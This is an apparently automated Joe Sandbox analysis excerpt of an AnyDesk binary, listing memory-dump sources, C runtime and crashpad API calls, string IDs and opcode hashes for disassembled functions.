                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                                                                  • API String ID: 0-1718035505
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 69C46343
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 69C4635F
                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 69C46376
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 69C46394
                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 69C463AB
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 69C463C9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1992179935-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,69C487AF,69C487AF,?,?,?,69C54F56,00000001,00000001,FCE85006), ref: 69C54D5F
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,69C54F56,00000001,00000001,FCE85006,?,?,?), ref: 69C54DE5
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,FCE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 69C54EDF
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C54EEC
                                                                                                                                                                                                                                                    • Part of subcall function 69C4C844: HeapAlloc.KERNEL32(00000000,0000010C,00000004,?,69C4C8A7,?,00000000,?,69C57B70,0000010C,00000004,?,0000010C,?,?,69C4DB9D), ref: 69C4C876
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C54EF5
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C54F1A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3147120248-0
                                                                                                                                                                                                                                                  • Opcode ID: 08b3318afe663e37608f5d0f93c3b32ce5af2324993c2c16333d374e5497bd85
                                                                                                                                                                                                                                                  • Instruction ID: 2438162d4ae11ebb29c57a5215392eea73c896e82142d8fb82f4188ac138e182
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08b3318afe663e37608f5d0f93c3b32ce5af2324993c2c16333d374e5497bd85
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC51D072700216AFEB15CF68EC40EABBBA9FB44B94F118629E916D7140FB74DC70C654
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C3C2B0: Sleep.KERNEL32(00000000,?,?,?,69C3C09F,?,00000000,?), ref: 69C3C2F2
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,?,00000000,?), ref: 69C3C0C4
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,00000000,000000FF,?,?), ref: 69C3C105
                                                                                                                                                                                                                                                    • Part of subcall function 69C2F000: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 69C2F02B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentDirectoryReleaseSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1427338700-0
                                                                                                                                                                                                                                                  • Opcode ID: 8812605fd61d380b0429046cbc95bfef119cadb51f99bc702d6bfd073caa177a
                                                                                                                                                                                                                                                  • Instruction ID: 48b6265802403f8008e1304614329f8640cad50957aacdb444e4f018d47f4375
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8812605fd61d380b0429046cbc95bfef119cadb51f99bc702d6bfd073caa177a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D251C9356482619BDF24DF65E841FFEB3A8BF85324F80461DE86E97180FB316405CBA2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,00000000,00000000,00000000), ref: 69C34EDB
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C34F0A
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,00000000,00000000,00000000), ref: 69C34F5A
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C34F91
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,00000000,00000000,00000000), ref: 69C34FCD
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C3500A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 17069307-0
                                                                                                                                                                                                                                                  • Opcode ID: 6782144d24456dc1596331de066411c1fca5c85defc375e8546d8aebfa77786f
                                                                                                                                                                                                                                                  • Instruction ID: dc45d52f45e7b4aa3a93d6ddd949a9d58b39142831fd86a2b39053b47130a1d8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6782144d24456dc1596331de066411c1fca5c85defc375e8546d8aebfa77786f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C241E336E026309BCB04DF68E5407ADBBB8BF8A354F954158D819E7380FF319E018B92
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FC0F
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC1C
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                                  • Opcode ID: c6a85edba0e490b7328fb3e08c39b0b9d0b621e59c042ef8d8a8245e67565d53
                                                                                                                                                                                                                                                  • Instruction ID: 072d32bf25709897d56f51e8c7020afca49a7665610db1b3cba11013ff009d8e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6a85edba0e490b7328fb3e08c39b0b9d0b621e59c042ef8d8a8245e67565d53
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34F0C83A7946516FE61256297E09F5E2639EFD3F76F219014FC14E61C0FF218807A122
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: vector<T> too long
                                                                                                                                                                                                                                                  • API String ID: 0-3788999226
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseDeleteFileHandle
                                                                                                                                                                                                                                                  • String ID: vmodule
                                                                                                                                                                                                                                                  • API String ID: 2633145722-2939338212
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(69C6FB90,00000000,00000000,00000004), ref: 69C644B0
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C644CE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 69C644DB, 69C64561
                                                                                                                                                                                                                                                  • GetFileAttributes , xrefs: 69C64507, 69C64592
                                                                                                                                                                                                                                                  • : not a directory, xrefs: 69C64571
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                                                  • String ID: : not a directory$GetFileAttributes $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc
                                                                                                                                                                                                                                                  • API String ID: 1799206407-2199784763
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 69C4532B
                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 69C453A5
                                                                                                                                                                                                                                                    • Part of subcall function 69C5E550: __FindPESection.LIBCMT ref: 69C5E5A9
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 69C45419
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 69C45444
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 1685366865-1018135373
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(69C6FB90,00000000,?,00000000,00000004), ref: 69C64247
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000004), ref: 69C64258
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000004), ref: 69C64278
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 69C64285
                                                                                                                                                                                                                                                  • CreateDirectory , xrefs: 69C642B1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$CreateDirectory
                                                                                                                                                                                                                                                  • String ID: CreateDirectory $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc
                                                                                                                                                                                                                                                  • API String ID: 1306683694-1373056967
                                                                                                                                                                                                                                                  • Opcode ID: 4ae309d829cf4c6ae26a00ba0fc1e19fd63aa16dc642d95a2784cb1b35702fdc
                                                                                                                                                                                                                                                  • Instruction ID: e8d450a2c953a65a3d93ce749aff9a5c525bc501a92872d037b34bdf4f73090a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ae309d829cf4c6ae26a00ba0fc1e19fd63aa16dc642d95a2784cb1b35702fdc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23210435640308AADB04DFA4FCA6FBE73ACEF41324F60911AF415AB0D2FB31A9458675
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,69C49EA0,69C21DE7,?,69C49E40,69C21DE7,69C7B670,0000000C,69C49F88,69C21DE7,00000002), ref: 69C49F0F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 69C49F22
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,69C49EA0,69C21DE7,?,69C49E40,69C21DE7,69C7B670,0000000C,69C49F88,69C21DE7,00000002,00000000), ref: 69C49F45
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                  • Opcode ID: 3f0ecd5c74eae5618913f3795e01e50de16c0dacd72ca5a6118244eccce71246
                                                                                                                                                                                                                                                  • Instruction ID: 3d87d0d87905b3ca0ce55d8528c72e67d7a45dcef600f8baf50c6c3c85a693db
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f0ecd5c74eae5618913f3795e01e50de16c0dacd72ca5a6118244eccce71246
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAF0C230A14628FFDF019F95DC08BADBFB8EF45B22F4040A5F809A2150EB349941CB96
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ca84f8b36e0b9b58da44a63e6e6f938320fae813a15ab7562883627a08a1bb0c
                                                                                                                                                                                                                                                  • Instruction ID: b3c7c5ee31a76b25e01cd0d190bcfebe335361daa9461c80494d8e57234818af
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca84f8b36e0b9b58da44a63e6e6f938320fae813a15ab7562883627a08a1bb0c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6571F635D00296DBDB11CF55D884ABFBBB6FF423A4F144229E422A7190FB708971CBA5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __cftoe.LIBCMT ref: 69C4B757
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4B77D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4B84F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4B882
                                                                                                                                                                                                                                                    • Part of subcall function 69C4B8F3: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,69C4FCCF,00000001,00000364,?,?,69C46175,00000000,00000000,00000000,00000000,00000000,0000010C), ref: 69C4B934
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4B8B8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$AllocHeap__cftoe
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 65443942-0
                                                                                                                                                                                                                                                  • Opcode ID: 5ebc924c2332e86076350864936e9c1b66e3595a6f674e6de89cef5f83c113c2
                                                                                                                                                                                                                                                  • Instruction ID: f990bdf32ceaa5bdc9a574ebe164207b7367d3780bc1e653d5241ce6ff2ae24f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ebc924c2332e86076350864936e9c1b66e3595a6f674e6de89cef5f83c113c2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7512C36B04205ABDB10CFA8ED81FAD77B8BF49B64F108229E825E6281FB35D5118775
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
